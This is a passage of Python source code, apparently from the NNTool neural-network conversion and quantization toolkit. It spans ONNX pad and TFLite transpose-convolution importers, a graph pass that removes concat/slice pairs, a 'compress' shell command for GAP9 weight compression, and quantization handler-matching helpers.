params, 0, ProvisionalDim(pshape), x[3])
return params
if mode != 'constant':
raise ValueError('%s - pad mode %s is not supported' %
(valid_name, mode))
if any(sum(pad) > 0 and x_shape[idx] is None for idx, pad in enumerate(apads)):
raise ValueError(
f'unknown/batch axis is being padded in {valid_name}. Manipulation of '
'unknown/batch axis is not supported')
trimmed_pads = tuple(
[pad for idx, pad in enumerate(apads) if x_shape[idx] is not None])
if all(sum(trimmed_pad) == 0 for trimmed_pad in trimmed_pads):
params = NoOPParameters(valid_name, desc="eliminated pad of 0")
pshape = x_shape
else:
pshape = [
dim + sum(apads[idx]) if dim is not None else None for idx, dim in enumerate(x_shape)]
# pshape = [None if dim is None else dim + sum(apads[idx]) for idx, dim in enumerate(x_shape)]
padvals = [(constant_value, constant_value)] * len(trimmed_pads)
params = PadParameters(
valid_name, padding=trimmed_pads, pad_vals=padvals)
G.add_edge(
NNEdge(from_node=x[0], to_node=params, from_idx=x[1], to_idx=0))
all_nodes[node.output[0]] = (params, 0, ProvisionalDim(pshape), x[3])
return params
@classmethod
def _args_version(cls, node, padkey='pads', **kwargs):
mode = node.attrs.get('mode', 'constant')
pads = node.attrs.get(padkey)
value = node.attrs.get('value')
return cls._common(node, mode=mode, pads=pads, constant_value=value, **kwargs)
@classmethod
def _inputs_version(cls, node, **kwargs):
mode = node.attrs.get('mode', 'constant')
if len(node.input) > 1 and node.input[1]:
y = kwargs['all_nodes'][node.input[1]]
pads = tuple(cls.get_constant(y))
if len(node.input) > 2 and node.input[2]:
z = kwargs['all_nodes'][node.input[2]]
value = cls.get_constant(z)
else:
value = 0
else:
raise ValueError('no pads input for node %s' %
kwargs['valid_name'])
return cls._common(node, mode=mode, pads=pads, constant_value=value, **kwargs)
@classmethod
def version_1(cls, node, **kwargs):
return cls._args_version(node, padkey='paddings', **kwargs)
@classmethod
def version_2(cls, node, **kwargs):
return cls._args_version(node, padkey='pads', **kwargs)
@classmethod
def version_11(cls, node, **kwargs):
return cls._inputs_version(node, **kwargs)
@classmethod
def version_13(cls, node, **kwargs):
return cls._inputs_version(node, **kwargs)
```
#### File: tflite2/common/tflite_graph.py
```python
from typing import Iterator, List
from importer.tflite2.common.tflite_node import TFLiteNode
from importer.tflite2.common.tflite_tensor import TFLiteTensorWrapper
from ..tflite_schema_head.Model import Model
from ..tflite_schema_head.SubGraph import SubGraph
from ..tflite_schema_head.Tensor import Tensor
class TFliteIterator():
def __init__(self, obj, len_prop, elem_prop) -> None:
self._obj = obj
self._len_prop = len_prop
self._elem_prop = elem_prop
self._idx = 0
def __len__(self):
return getattr(self._obj, self._len_prop)(self._obj)
def __next__(self):
if self._idx >= len(self):
raise StopIteration()
elem = getattr(self._obj, self._elem_prop)(self._obj, self._idx)
self._idx += 1
return elem
def __iter__(self):
self._idx = 0
return self
def __getitem__(self, idx):
return getattr(self._obj, self._elem_prop)(self._obj, idx)
class TFLiteGraph():
def __init__(self, model: Model, subgraph: SubGraph, subgraph_idx: int, name_cache=None, anonymise=False) -> None:
self._model = model
self._subgraph = subgraph
self._subgraph_idx = subgraph_idx
self._tensors = [TFLiteTensorWrapper(self._subgraph.Tensors(
idx), self._model) for idx in range(self._subgraph.TensorsLength())]
self._nodes = [TFLiteNode(self._subgraph.Operators(idx), idx, self._model,
self, name_cache=name_cache, anonymise=anonymise)
for idx in range(self._subgraph.OperatorsLength())]
@classmethod
def from_model(cls, model: Model, subgraph_idx: int, name_cache=None, anonymise=False):
return cls(model, model.Subgraphs(subgraph_idx), subgraph_idx,
name_cache=name_cache, anonymise=anonymise)
@property
def model_version(self) -> int:
return self._model.Version()
@property
def tensors(self) -> Iterator[Tensor]:
return self._tensors
@property
def input(self) -> List[TFLiteTensorWrapper]:
return [self.tensors[idx] for idx in self._subgraph.InputsAsNumpy()]
@property
def output(self) -> List[TFLiteTensorWrapper]:
return [self.tensors[idx] for idx in self._subgraph.OutputsAsNumpy()]
@property
def nodes(self) -> List[TFLiteNode]:
return self._nodes
@property
def idx(self):
return self._subgraph_idx
```
#### File: handlers/backend/filter_pad_mixin.py
```python
from graph.dim import PadDim
from importer.tflite2.tflite_schema_head.Padding import Padding
class FilterPadMixin(object):
@classmethod
def get_tf_padding(cls, padding):
if padding == Padding.SAME:
return PadDim.same()
if padding == Padding.VALID:
return PadDim.valid()
raise ValueError("Strange padding type")
```
#### File: handlers/backend/transpose_conv.py
```python
from graph.dim import Conv2DFilterDim, PadDim, StrideDim
from graph.types import NNEdge, TransposeConv2DParameters
from importer.common.constant_mixin import ConstantMixin
from importer.common.provisional_dim import ProvisionalDim
from importer.tflite2.common.tflite_node import TFLiteNode
from importer.tflite2.tflite_schema_head.Padding import Padding
from importer.tflite2.tflite_schema_head.TransposeConvOptions import \
TransposeConvOptions
from ..backend_handler import BackendHandler
from ..handler import tflite_op, partial_support, ps_description
from .filter_mixin import FilterMixin
@tflite_op("TRANSPOSE_CONV")
@partial_support(True)
@ps_description('Transpose Conv is only imported. No kernels are implemented for it. We suggest'
'using a resizer followed by a normal convolution.')
class TransposeConv(ConstantMixin, FilterMixin, BackendHandler):
@classmethod
def version_1(cls, node: TFLiteNode, **kwargs):
node_opts = node.get_options(TransposeConvOptions)
G = kwargs['G']
opts = kwargs['opts']
all_nodes = kwargs['all_nodes']
inputs = [all_nodes[t] for t in node.input]
x = inputs[2]
x_shape = x[2].shape
in_b, in_h, in_w, in_c = tuple(x_shape)
pout_shape = [dim if x_shape[idx] is not None else None for idx,
dim in enumerate(cls.get_constant(inputs[0]))]
out_b, out_h, out_w, out_c = tuple(pout_shape)
filt = inputs[1]
weights_node = filt[0]
filt_shape = filt[2].shape
# # ['in_c', 'h', 'w', 'out_c']
filt_out_c, filt_h, filt_w, filt_in_c = tuple(filt_shape)
filt_dim = Conv2DFilterDim(filt_h, filt_w,
filt_out_c, in_c=filt_in_c)
filt_dim = filt_dim.impose_order(cls.TF_LITE_FILTER_ORDER)
stride_w = node_opts.StrideW()
stride_h = node_opts.StrideH()
# compute padding
pad = node_opts.Padding()
if pad == Padding.SAME:
pad_h = ((in_h - 1) * stride_h + filt_h - out_h)
pad_w = ((in_w - 1) * stride_w + filt_w - out_w)
pad_top = pad_h // 2
pad_left = pad_w // 2
pad = PadDim(pad_top, pad_h - pad_top, pad_left,
pad_w - pad_left, same_type='balanced_right')
else:
pad = PadDim(0)
params = TransposeConv2DParameters(
node.name,
filt=filt_dim,
stride=StrideDim(
stride_h, stride_w),
padding=pad,
in_dims_hint=[['h', 'w', 'c'], cls.TF_LITE_FILTER_ORDER.copy()],
out_dims_hint=[['h', 'w', 'c']])
G.add_edge(
NNEdge(from_node=x[0], to_node=params, from_idx=x[1], to_idx=0))
G.add_edge(NNEdge(from_node=weights_node, to_node=params, to_idx=1))
pout_dims = ProvisionalDim(pout_shape)
all_nodes[node.output[0]] = (params, 0, pout_dims)
return params
```
#### File: handlers/backend/unconverted_mixin.py
```python
from graph.dim import Dim
from graph.types import UnconvertedOpParameters
from importer.tflite2.handlers.backend.math_mixin import BasicMathMixin
class UnconvertedMixin(BasicMathMixin):
@classmethod
def _common(cls, node, **kwargs):
all_nodes = kwargs['all_nodes']
inputs = [all_nodes[t] for t in node.input]
x = inputs[0]
return super(UnconvertedMixin, cls)._common(
node,
params_class=UnconvertedOpParameters,
params_args={
'indicated_op_name': cls.TFLITE_OP,
'indicated_outputs': [Dim.unnamed(x[2].known_shape)]
},
**kwargs)
@classmethod
def version_1(cls, node, **kwargs):
return cls._common(node, **kwargs)
```
#### File: importer/tflite2/remove_concats.py
```python
import logging
from graph.matches.matcher import find_forward
from graph.types import (ConcatParameters, NNEdge, NoOPParameters,
StridedSliceParameters)
from utils.node_id import NodeId
LOG = logging.getLogger('nntool.' + __name__)
def remove_concats(G):
concat_nodes = list([node for node in G.nodes() if isinstance(node, ConcatParameters)])
strided_slices_removed = []
concats_removed = []
for node in concat_nodes:
concat_out_edges = G.indexed_out_edges(node.name)[0]
concat_in_edges = G.indexed_in_edges(node.name)
axis_slices = []
start_idx = 0
# find the slice patterns that can match inputs
for in_idx, dim in enumerate(node.in_dims):
slice_patterns = [(start_idx, start_idx + dim.shape[node.axis], 1)]
if dim.shape[node.axis] == 1:
# can also match reversed
slice_patterns.append((start_idx, start_idx - 1, -1))
axis_slices.append(slice_patterns)
start_idx += dim.shape[node.axis]
for out_edge in concat_out_edges:
edge_lists = find_forward(G, out_edge,
StridedSliceParameters,
skip_node_classes=NoOPParameters)
# each list of edges goes to a strided slice
for edge_list in edge_lists:
edge = edge_list[-1]
assert isinstance(edge.to_node, StridedSliceParameters)
ssp = edge.to_node
LOG.info("found strided slice %s", ssp.name)
# must only slice axis of concat
if not ssp.only_slices_axis(node.axis):
LOG.info("rejected: slices more than one axis")
continue
# must match a slice pattern on the input
ssp_slice = ssp.act_slice[node.axis]
in_idx = None
for idx, slice_patterns in enumerate(axis_slices):
if ssp_slice in slice_patterns:
in_idx = idx
break
if in_idx is None:
LOG.info("rejected: slices pattern matching concat not found")
continue
LOG.info("removing slice %s", ssp.name)
strided_slices_removed.append(ssp.name)
# save the out edges
ssp_out_edges = G.out_edges(ssp.name)
in_edge = concat_in_edges[in_idx]
# remove all the nodes including the ssp
for inter_edge in edge_list:
if G.quantization:
del G.quantization[NodeId(inter_edge.to_node)]
G.remove(inter_edge.to_node)
# connect all the ssp out edges to the node on the concat input
for ssp_out_edge in ssp_out_edges:
G.add_edge(NNEdge(in_edge.from_node, ssp_out_edge.to_node,
from_idx=in_edge.from_idx,
to_idx=ssp_out_edge.to_idx))
# if the concat now has no out edges remove it
if G.num_out_edges(node.name) == 0:
LOG.info("removing concat %s", node.name)
concats_removed.append(node.name)
G.remove(node)
return (strided_slices_removed, concats_removed)
```
#### File: interpreter/commands/compress.py
```python
import json
import math
import texttable
from cmd2 import Cmd, with_argparser
from interpreter.commands.validation import get_validator, validation_options
from interpreter.nntool_shell_base import (NODE_SELECTOR_HELP,
NNToolArguementParser,
NNToolShellBase)
from interpreter.shell_utils import input_options
from quantization.compression.auto_compress import AutoCompress
from quantization.compression.compress import CompressionError
from utils.node_id import NodeId
from graph.types import ConstantInputParameters
class CompressCommand(NNToolShellBase):
# COMPRESS COMMAND
parser_compress = NNToolArguementParser()
parser_compress.add_argument(
'step',
nargs='?',
help='constant input to compress. ' + NODE_SELECTOR_HELP,
completer_method=NNToolShellBase.node_step_or_name_completer(allow_comma=True))
parser_compress.add_argument(
'--no_sparse', action="store_true",
help='Do not check for sparsity'
)
parser_compress.add_argument(
'--force_sparse', action="store_true",
help='Force these layers to use sparse bit (adds an extra bin)'
)
parser_compress.add_argument(
'--threshold', type=float,
help='set values val>x>-val to 0 before clustering'
)
parser_compress_sub = parser_compress.add_subparsers(
title='compress subcommands', help='compression strategy for the selected layers')
parser_compress_bits = parser_compress_sub.add_parser(
'bits',
help='compress using a lookup index of a fixed number of bits')
parser_compress_bits.add_argument(
'num_bits', choices=list(str(v) for v in range(2, 8)),
help='number of bits to use for lookup table indexes'
)
parser_compress_min_qnsr = parser_compress_sub.add_parser(
'min_qsnr',
help='compress keeping the value QSNR above a minimum value')
parser_compress_min_qnsr.add_argument(
'qsnr', type=int,
help='QSNR to keep above'
)
parser_compress_auto = parser_compress_sub.add_parser(
'auto',
help='compress to a number of bits automatically using validation results')
parser_compress_auto.add_argument(
'--finetune', action="store_true",
help='Experimental layer finetuning'
)
validation_options(parser_compress_auto)
input_options(parser_compress_auto)
parser_compress_clear = parser_compress_sub.add_parser(
'clear',
help='clear compression on these nodes')
parser_compress_off = parser_compress_sub.add_parser(
'off',
help='disable compression on these nodes')
parser_compress_on = parser_compress_sub.add_parser(
'on',
help='enable compression on these nodes')
parser_compress_save = parser_compress_sub.add_parser(
'save',
help='save compression settings to a file in json format')
parser_compress_save.add_argument(
'file',
completer_method=Cmd.path_complete,
help='file to save to'
)
parser_compress_load = parser_compress_sub.add_parser(
'load',
help='load compression settings from a file in json format')
parser_compress_load.add_argument(
'file',
completer_method=Cmd.path_complete,
help='file to load from'
)
parser_compress_bits.set_defaults(operation='bits')
parser_compress_min_qnsr.set_defaults(operation='min_qsnr')
parser_compress_auto.set_defaults(operation='auto')
parser_compress_clear.set_defaults(operation='clear')
parser_compress_off.set_defaults(operation='off')
parser_compress_on.set_defaults(operation='on')
parser_compress_save.set_defaults(operation='save')
parser_compress_load.set_defaults(operation='load')
@with_argparser(parser_compress)
def do_compress(self, args):
"""
Compress graph constants for GAP9 compression engine. Compress with no arguments will list current compression settings.
The compressed size in the results table includes the size of the codebook.
In bits mode the amount of bits used for table indexes is specified directly. It should be from 2 to 8.
In min_qsnr mode the tensors will be compressed with the number of bits necessary to stay above the given QSNR value. A
value of around 30 is a good starting point.
The auto mode uses the validation engine to explore possible tensor compression parameters. THe command options are the
same as the validate command. The first part of the process tries to find the lowest QSNR that can be selected for
compression of all viable parameters with no bad validation results.
The threshold argument can be used to clip values to zero before compression.
"""
self._check_graph()
if not args.step:
if hasattr(args, 'operation'):
nodes = self.G.nodes(node_classes=ConstantInputParameters)
else:
self.compress_make_table(self.G.nodes(
node_classes=ConstantInputParameters))
return
else:
nodes, _ = self.get_node_step_or_name(
args.step, classes=ConstantInputParameters, allow_comma=True)
if not nodes:
return
if not args.operation:
# No subcommand was provided, so call help
self.do_help('compress')
return
if args.operation == "clear":
for node in nodes:
node.use_compressed = False
node.compressed_value = None
self.pfeedback(f'clear compression on {node.name}')
return
if args.operation == "on":
for node in nodes:
if node.compressed_value:
node.use_compressed = True
self.pfeedback(f'enable compression on {node.name}')
else:
self.perror(
f"can't enable compression on {node.name} - not set")
return
if args.operation == "off":
for node in nodes:
node.use_compressed = False
self.pfeedback(f'disable compression on {node.name}')
return
if args.operation == "save":
save_map = {}
for node in nodes:
if node.compressed_value:
comp_val = node.compressed_value
save_map[node.name] = {
'bits': comp_val.bits,
'threshold': comp_val.threshold,
'sparse': bool(comp_val.sparse),
}
with open(args.file, 'w') as fp:
fp.write(json.dumps(save_map))
return
report_nodes = []
if args.operation == "load":
with open(args.file, 'r') as fp:
save_map = json.load(fp)
for node in nodes:
if node.name in save_map:
self.pfeedback(f"Loading parameters for {node.name}")
try:
params = save_map[node.name]
node.compress_value(
bits=params['bits'],
threshold=params['threshold'],
allow_sparse=params['sparse'],
force_sparse=params['sparse'],
)
comp_val = node.compressed_value
node.use_compressed = True
except CompressionError as ex:
self.pfeedback(f'unable to compress {node.name} - {ex}')
comp_val = None
if comp_val:
report_nodes.append(node)
return
elif args.operation == "auto":
if args.quantize:
self._check_quantized()
input_args = self._get_input_args(args)
autocompress = AutoCompress(
self.G,
args.input_files,
get_validator(args),
input_args,
prediction_step_idx=args.prediction_step_idx)
def progress(msg, newline):
print(msg, end='\n' if newline else '', flush=True)
try:
autocompress.tune_all(nodes, progress, quantize=args.quantize)
if args.finetune:
report_nodes = [node for node in nodes if node.use_compressed]
self.compress_make_table(report_nodes)
autocompress.finetune(nodes, progress, quantize=args.quantize)
except (KeyboardInterrupt, SystemExit):
pass
report_nodes = [node for node in nodes if node.use_compressed]
else:
for node in nodes:
self.pfeedback(f"Evaluating {node.name}")
nid = NodeId(node)
if self.G.quantization and nid in self.G.quantization:
qtype = self.G.quantization[nid].out_qs[0]
else:
qtype = None
try:
kwargs = {
'qtype': qtype,
'threshold': args.threshold,
'allow_sparse': not args.no_sparse,
'force_sparse': args.force_sparse
}
if args.operation == "bits":
kwargs['bits'] = int(args.num_bits)
elif args.operation == "min_qsnr":
kwargs['min_qsnr'] = args.qsnr
elif args.operation == "auto":
pass
else:
raise ValueError('strange operation')
node.compress_value(**kwargs)
comp_val = node.compressed_value
node.use_compressed = True
except CompressionError as ex:
self.pfeedback(f'unable to compress {node.name} - {ex}')
comp_val = None
if comp_val:
report_nodes.append(node)
self.compress_make_table(report_nodes)
def compress_make_table(self, nodes):
comp_size = 0
node_size = 0
comp_report = [["Step", "Name", "Orig Size",
"Compressed Size", "%age orig", "Bits", "Sparse", "Enabled"]]
for node in nodes:
if not node.compressed_value:
continue
nid = NodeId(node)
if self.G.quantization and nid in self.G.quantization:
qbits = self.G.quantization[NodeId(node)].out_qs[0].bits
else:
qbits = 8
old_size = int(math.floor((node.value.size * qbits)/8))
comp_val = node.compressed_value
node_size += node.value.size
comp_size += comp_val.size
comp_report.append([
node.step_idx, node.name, old_size, comp_val.size, (
100 * comp_val.size)//old_size,
comp_val.bits, "Yes" if comp_val.sparse else "No", "Yes" if node.use_compressed else "No"
])
if comp_size == 0:
self.pfeedback("no constants compressed")
return
comp_report.append([
"", "Total", node_size, comp_size, (100 *
comp_size)//node_size, "", "", ""
])
table = texttable.Texttable()
table.set_cols_align(['l', 'l', 'l', 'l', 'l', 'l', 'l', 'l'])
table.set_max_width(120)
table.add_rows(comp_report)
self.pfeedback("Compression report\n")
self.pfeedback(table.draw()+'\n')
```
#### File: nntool/interpreter/nntool_shell.py
```python
import logging
from interpreter.nntool_shell_base import NNToolShellBase
# pylint: disable=wildcard-import,unused-wildcard-import
from .commands import *
LOG = logging.getLogger("nntool")
VALID_LOG_LEVELS = [
"INFO",
"DEBUG",
"WARNING"
]
COMMANDS = NNToolShellBase.__subclasses__()
class CommandMixer(type):
def __new__(cls, name, base, ns):
return type.__new__(cls, name, tuple(COMMANDS + list(base)), ns)
class NNToolShell(NNToolShellBase, metaclass=CommandMixer):
intro = 'Welcome to NNTOOL. Type help or ? to list commands.\n'
prompt = '(NNT) '
```
#### File: nntool/quantization/handlers_helpers.py
```python
import logging
import numpy as np
from cmd2.argparse_custom import Cmd2ArgumentParser
from graph.types import ConstantInputParameters, ReluActivationParameters
from graph.types.base import Parameters
from iteration_utilities import duplicates
from utils.subclasses import get_all_subclasses
# pylint: disable=wildcard-import,unused-wildcard-import
from quantization.float.quantizers import *
from quantization.multiplicative.quantizers import *
from quantization.qtype import QType
from quantization.qtype_constraint import MatchAll
from quantization.quantizers import *
from quantization.symmetric.quantizers import *
from quantization.unified_quantization_handler import QuantizionHandler
LOG = logging.getLogger('nntool.' + __name__)
def add_in_handlers(existing, new):
for handler in new:
if handler not in existing:
existing.append(handler)
def get_quantization_handlers():
"""This sets up the handler map.
The priority for schemes is:
- If a handler is present for a class then for the declared scheme
or any scheme if SCHEME is None it is matched
- If a handler is present for a superclass of the class then for the
declared scheme or any scheme if SCHEME is None it is matched
- The default handler for the scheme is matched
"""
handlers = {}
schemes = set()
# Collect all handlers
for cls in get_all_subclasses(QuantizionHandler):
if not cls.PARAMS_TYPE:
continue
if cls.SCHEME:
schemes.add(cls.SCHEME)
for params_cls in cls.PARAMS_TYPE:
phandlers = handlers.setdefault(params_cls, {})
pscheme_handlers = phandlers.setdefault(cls.SCHEME, [])
pscheme_handlers.append(cls)
# Iterate through all parameters and set a scheme
for pclass in get_all_subclasses(Parameters):
# parameters does not define an op name
if not pclass.CLS_OP_NAME:
continue
# see if we have any handlers for this class
phandlers = handlers.setdefault(pclass, {})
for scheme in schemes:
# handlers for class and scheme are already present
matched_handlers = phandlers.setdefault(scheme, [])
for hpclass, class_handlers in handlers.items():
if hpclass == '__default__':
continue
if issubclass(pclass, hpclass):
# is subclass and scheme is present
if scheme in class_handlers:
add_in_handlers(matched_handlers,
class_handlers[scheme])
# is subclass and all schemes match is present
if None in class_handlers:
add_in_handlers(matched_handlers,
class_handlers[scheme])
if not matched_handlers:
# match the default scheme
add_in_handlers(matched_handlers,
handlers['__default__'][scheme])
del handlers['__default__']
return handlers
def get_all_options():
options = {}
for handler in get_all_subclasses(QuantizionHandler):
if not handler.OPTIONS:
continue
for opt_name, opt in handler.OPTIONS.items():
optrec = options.setdefault(opt_name, {'handlers': set()})
for k in opt.keys():
if k in optrec:
if k != 'help' and opt[k] != optrec[k]:
raise ValueError(
f'Quantization option {k} has different definitions')
else:
optrec[k] = opt[k]
optrec['handlers'].add(handler)
return options
def get_all_options_by_params():
options = {}
for handler in get_all_subclasses(QuantizionHandler):
if handler.PARAMS_TYPE is None or not handler.OPTIONS:
continue
for params in handler.PARAMS_TYPE:
if params == '__default__':
params = Parameters
options.setdefault(params, {}).update(handler.OPTIONS)
for params in get_all_subclasses(Parameters):
poptions = {}
for k, v in options.items():
if issubclass(params, k):
poptions.update(v)
options[params] = poptions
return options
def add_options_to_parser(parser: Cmd2ArgumentParser):
opts = get_all_options()
shortcuts = [opt['shortcut'] for opt in opts.values() if 'shortcut' in opt]
duplicate_shortcuts = set(duplicates(shortcuts))
assert not duplicate_shortcuts, f'the following shortcut commands are duplicates {",".join(duplicate_shortcuts)}'
for opt_name, opt in opts.items():
if opt.get('type') is None:
continue # internal option
if 'shortcut' in opt:
names = [f'-{opt["shortcut"]}']
else:
names = []
if opt.get('type') == bool:
parse_options = {'help': opt.get('help'), 'action': 'store_true'}
if opt.get('default'):
names = [f'--no_{opt_name}']
else:
names.append(f'--{opt_name}')
parser.add_argument(*names, **parse_options)
else:
parse_options = {k: opt.get(k) for k in [
'type', 'choices', 'help']}
names.append(f'--{opt_name}')
parser.add_argument(*names, **parse_options)
def get_arg_or_default(args, opt_name, opt):
arg = getattr(args, opt_name)
if arg is None:
arg = opt.get('default')
return arg
def get_options_from_args(args):
return {opt_name: (not getattr(args, f'no_{opt_name}'))
if opt.get('type') == bool and opt.get('default')
else get_arg_or_default(args, opt_name, opt)
for opt_name, opt in get_all_options().items() if opt['type'] is not None}
def get_set_options_from_args(args):
return {opt_name: (not getattr(args, f'no_{opt_name}'))
if opt.get('type') == bool and opt.get('default')
else getattr(args, opt_name)
for opt_name, opt in get_all_options().items()
if getattr(args, f'no_{opt_name}' if opt.get('type') == bool
and opt.get('default') else opt_name) is not None}
def match_qtype(constraint, qtype_or_dict):
if qtype_or_dict is None:
return True
# constant always matches since it can always be mutated into a different type
if qtype_or_dict.is_constant:
return True
for k, v in constraint.items():
if isinstance(qtype_or_dict, dict):
if k not in qtype_or_dict:
return False
val = qtype_or_dict[k]
else:
if not hasattr(qtype_or_dict, k):
return False
val = getattr(qtype_or_dict, k)
if k == 'attr':
assert isinstance(
v, dict), 'expecting dictionary for attribut match'
attr = qtype_or_dict.attr
if not all(hasattr(attr, attr_k) and getattr(attr, attr_k) == attr_val
for attr_k, attr_val in v.items()):
return False
elif isinstance(v, type(lambda: None)):
if not v(val):
return False
elif isinstance(v, set):
val = val if isinstance(val, set) else set([val])
if not (v & val):
return False
elif isinstance(val, np.ndarray):
if not np.all(val == v):
return False
elif val != v:
return False
return True
def get_closest_qtype(constraint, qtype):
if 'dtype' in constraint:
dtype_constraint = constraint['dtype']
if isinstance(dtype_constraint, set):
return QType(dtype=next(dtype_constraint))
return QType(dtype=dtype_constraint)
return None
def match_in_out_qs(handler, name, in_out_qs, ignore_edge=None):
key = f'{name.upper()}_CONSTRAINTS'
constraints = getattr(handler, key)
if not constraints:
return True
for idx, constraint in enumerate(constraints):
# constant input edges always match since a constant can always be requantized
if ignore_edge and ignore_edge[idx]:
continue
if idx >= len(in_out_qs):
return False
if isinstance(constraint, MatchAll):
# match single constrain from here on
return all(True if ignore_edge and ignore_edge[jdx] else
match_qtype(constraint.constraint, in_out_qs[jdx])
for jdx in range(idx, len(in_out_qs)))
if not match_qtype(constraint, in_out_qs[idx]):
return False
return True
def match_in_qs(ignore_edge, handler, in_qs):
return match_in_out_qs(handler, 'INPUT', in_qs, ignore_edge=ignore_edge)
def match_out_qs(handler, out_qs):
return match_in_out_qs(handler, 'OUTPUT', out_qs)
def constrained_in_edges(G, name, in_qs, constraints):
match_all = None
for idx, edge in enumerate(G.indexed_in_edges(name)):
if edge is None:
continue
if match_all:
if match_qtype(constraints.constraint, in_qs[idx]):
continue
yield idx, edge, get_closest_qtype(constraints.constraint, in_qs[idx])
else:
if idx >= len(constraints):
break
if match_qtype(constraints[idx], in_qs[idx]):
continue
yield idx, edge, get_closest_qtype(constraints[idx], in_qs[idx])
def add_handler(handlers, scheme, scheme_handler):
scheme_handlers = handlers.setdefault(scheme, [])
if scheme_handler not in scheme_handlers:
scheme_handlers.append(scheme_handler)
def check_constraints(ignore_edge, handlers, scheme_priorities, in_qs_constraint, out_qs_constraint):
if handlers is None:
return None
# filter any handlers matching input and output constraints
filtered_phandlers = {}
for scheme, scheme_handlers in handlers.items():
for scheme_handler in scheme_handlers:
if in_qs_constraint and not match_in_qs(ignore_edge, scheme_handler, in_qs_constraint):
continue
if out_qs_constraint and not match_out_qs(scheme_handler, out_qs_constraint):
continue
add_handler(filtered_phandlers, scheme, scheme_handler)
# select the handler with the highest scheme priority
for scheme in scheme_priorities:
if scheme in filtered_phandlers:
selected_handlers = filtered_phandlers[scheme]
break
else:
return None
return sorted(selected_handlers, key=lambda x: x.PRIORITY)[0]
def check_option_constraints(handlers, params, options, **kwargs):
filtered_phandlers = {}
for scheme, scheme_handlers in handlers.items():
for scheme_handler in scheme_handlers:
if scheme_handler.OPTION_CONSTRAINT:
for k, v in scheme_handler.OPTION_CONSTRAINT.items():
if k == '__function_constraint':
if not v(params, **kwargs):
break
else:
set_value = options.get(k)
if callable(v):
if not v(set_value, params, **kwargs):
break
elif isinstance(v, set):
if set_value not in v:
break
elif set_value != v:
break
else:
add_handler(filtered_phandlers, scheme, scheme_handler)
else:
add_handler(filtered_phandlers, scheme, scheme_handler)
return filtered_phandlers
def match_handler(graph, handlers, params, scheme_priorities, options,
in_qs_constraint=None, out_qs_constraint=None, **kwargs):
# don't run match on constants or unconnected edges
ignore_edge = [isinstance(edge.from_node, ConstantInputParameters) if edge is not None else True
for edge in graph.indexed_in_edges(params.name)]
# match the class
params_handlers = handlers.get(params.__class__)
params_handlers = check_option_constraints(
params_handlers, params, options, **kwargs)
handler = check_constraints(
ignore_edge, params_handlers, scheme_priorities, in_qs_constraint, out_qs_constraint)
return handler
```
#### File: quantization/kernels/fusion_inout.py
```python
from quantization.new_qrec import QRec
from graph.types import FusionInputParameters, FusionOutputParameters
from .kernel_base import KernelBase, qrec_type, params_type
@params_type(FusionInputParameters, FusionOutputParameters)
@qrec_type('any')
class FusionNoopKernel(KernelBase):
@classmethod
def execute(cls, params,
in_tensors,
qrec: QRec,
**kwargs):
in_tensor = in_tensors[params.idx]
in_tensor = in_tensor.reshape(params.dims.shape)
return [in_tensor]
```
#### File: quantization/multiplicative/mult_quantization_handler.py
```python
import numpy as np
from quantization.qtype import QType
from quantization.quantizer_options import SQBITS_OPTION_DEFAULT_8
from ..unified_quantization_handler import QuantizionHandler, options, scheme
#pylint: disable=abstract-method
@options(
SQBITS_OPTION_DEFAULT_8
)
@scheme('SQ8')
class MultQuantizionHandler(QuantizionHandler):
BITS_TO_DTYPE = {
8: np.int8,
16: np.int16
}
@classmethod
def get_mult_opts(cls, **kwargs):
force_out_qs = kwargs.get('force_out_qs', None)
opts = kwargs.get('opts', {})
bits = opts.get('sq_bits', 8)
return force_out_qs, cls.BITS_TO_DTYPE[bits]
@classmethod
def force_symmetric(cls, in_qs, idx=None, dtype=None):
res_qs = []
for in_q_idx, in_q in enumerate(in_qs):
if in_qs is None or idx is not None and idx != in_q_idx:
res_qs.append(in_q)
continue
update = False
if in_q.asymmetric:
# you need to change scale to change zero point
if in_q.forced_zero_point or in_q.forced_scale:
return None
update = True
if dtype is not None and dtype != in_q.dtype:
if in_q.forced_dtype:
return None
update = True
if update:
this_dtype = in_q.dtype if dtype is None else dtype
in_q = QType.from_min_max_sq(in_q.min_val, in_q.max_val,
dtype=this_dtype)
in_q.set_forced('zero_point')
res_qs.append(in_q)
return res_qs
@classmethod
def force_symmetric_and_dtype(cls, in_qs, dtype=None, idx=None):
return cls.force_symmetric(in_qs, idx=idx, dtype=dtype)
@classmethod
def _get_in_qs_from_stats(cls, params, stats, in_qs, **kwargs):
return [QType.from_min_max_sq(stats['range_in'][idx]['min'],
stats['range_in'][idx]['max'],
dtype=np.int8)
if dim is not None else None
for idx, dim in enumerate(params.in_dims)]
@classmethod
def can_handle_asymmetric_input(cls, params, **kwargs):
return False
```
#### File: quantization/quantizers/concat_mixin.py
```python
import logging
from abc import ABC, abstractmethod
from copy import deepcopy
from quantization.qtype import QType
from quantization.new_qrec import QRec
LOG = logging.getLogger('nntool.' + __name__)
class ConcatMixin(ABC):
@classmethod
def _handle(cls, params, in_qs, _, **kwargs):
force_out_qs = kwargs['force_out_qs']
force_out_q = force_out_qs[0] if force_out_qs else None
forced_in_qs = [in_q for in_q in in_qs if in_q.forced]
# two inputs cannot be forced to different values
if forced_in_qs and not QType.forced_equal(*forced_in_qs):
LOG.info(
'two input qtypes of concat %s are forced to different qtypes', params.name)
return None
# input cannot be forced to different value than output
if force_out_q and not force_out_q.can_force(*forced_in_qs):
LOG.info(
'output and input of concat %s are forced to different qtypes', params.name)
return None
backwards = kwargs.get('backwards')
# if we are going backwards or are forced
if backwards:
if force_out_q:
ok = True
if force_out_q.forced_dtype and any(in_q.dtype != force_out_q.dtype for in_q in in_qs):
ok = False
if force_out_q.forced_zero_point or force_out_q.forced_scale or force_out_q.forced_q:
ok = False
# if output must be forced
if not ok:
in_qs = [deepcopy(force_out_q) for _ in in_qs]
return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(force_out_q)])
# if all the inputs are the same qtype then we output that qtype
if all(in_qs[0] == in_q for in_q in in_qs[1::]):
return QRec(ktype=cls.KTYPE, in_qs=in_qs, out_qs=[deepcopy(in_qs[0])])
# our output cannot be forced at this point
# if an input has scale or q forced then all forced inputs must be the same here
# TODO - have a general function for this problem - should pick with force constraints respecting dtype
# if forced_in_qs and any(fin_qs.forced_scale or fin_qs.forced_q for fin_qs in forced_in_qs):
# in_qs = [deepcopy(forced_in_qs[0]) for _ in in_qs]
